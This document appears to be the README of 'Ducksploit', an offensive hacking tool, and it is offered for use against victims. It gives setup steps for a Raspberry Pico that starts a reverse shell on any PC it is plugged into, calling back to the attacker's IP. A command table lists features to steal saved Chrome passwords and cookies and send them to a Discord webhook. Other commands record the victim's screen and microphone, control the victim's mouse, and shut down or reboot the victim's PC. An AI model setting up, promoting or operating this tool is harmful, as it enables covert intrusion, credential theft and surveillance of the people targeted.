Awsome crossbreed of batch and python on Windows ♥
- Download https://github.com/canarddu38/DUCKSPLOIT/archive/root.zip
- Extract downloaded zip file
- Plugg your raspberry pico on your PC with the BOOTSEL button
- Move CircuitPython.uf2 file in the E:\ or F:\ <-- usb port (port of your pico) now your raspberry pico gonna leave usb port and reconnec with CIRCUITPY name
- Erase all the content of your raspberry pico and copy all the extracted repo folder into him
- Write myip.txt and write your own IP
- Now your raspberry pico is full configured , unplugg your pico and done!
- Download https://github.com/canarddu38/DUCKSPLOIT/archive/root.zip
- Extract downloaded zip file
- If python is not installed, launch 'installpython.bat' or download at https://www.python.org/ftp/python/3.8.0/python-3.8.0.exe
- launch setup.bat ###MUST BE RUN AS ADMINISTRATOR###
- wait till installation is finished
- Ducksploit is now installed on your PC 😄
- Type 'ds' in the cmd
- Wait victim's connection using 'wait' command
- Have fun with ducksploit hacking commands (type help to get commands list)
Just plugg the raspberry pico in your pc (or hacker can do also) That will start automaticaly the client of the reverse shell
- type 'ds uninstall' in cmd
- Done 😄
Command | Usage | Result |
---|---|---|
wait | wait | wait your victim's connection |
Command | Usage | Result |
---|---|---|
info | info | view all your account's infos |
Command | Usage | Result |
---|---|---|
stealpwds | stealpwds (discord webhook url) | steal all saved chrome passwords of your victim and send them into a discord webhook |
stealcookies | stealcookies (discord webhook url) | steal all saved chrome cookies of your victim and send them into a discord webhook |
open | open (applicationname.exe) | open mensioned application |
recordscreen | recordscreen (time in second) | record victim's screen durring amount of time |
recordmicro | recordmicro (time in second) | record victim's micro durring amount of time |
Command | Usage | Result |
---|---|---|
mouseclick | mouseclick [left, right, middle] | make the victim click the mensionned button |
mousemove | mousemove (x) (y) | move the victim's cursor by x and y pixels |
locatemouse | locatemouse | get the victim's cursor current locations |
Command | Usage | Result |
---|---|---|
msg | msg (title) (line1) (line2) | create an alertbox and send it on the vitim's pc with a title and 2 lines (if -file set line1 to createfile command content) |
Command | Usage | Result |
---|---|---|
skull | skull | spam cmds with skull and crossbones |
Command | Usage | Result |
---|---|---|
uninstall | uninstall | uninstall ducksploit |
update | update | update ducksploit |
credits | credits | view ducksploit's credits |
help | help | getting the list of all commands |
shutdown | shutdown | make the victim's pc shutdown |
reboot | reboot | make the victim's pc reboot |
closesession | closesesion | make the victim's session close |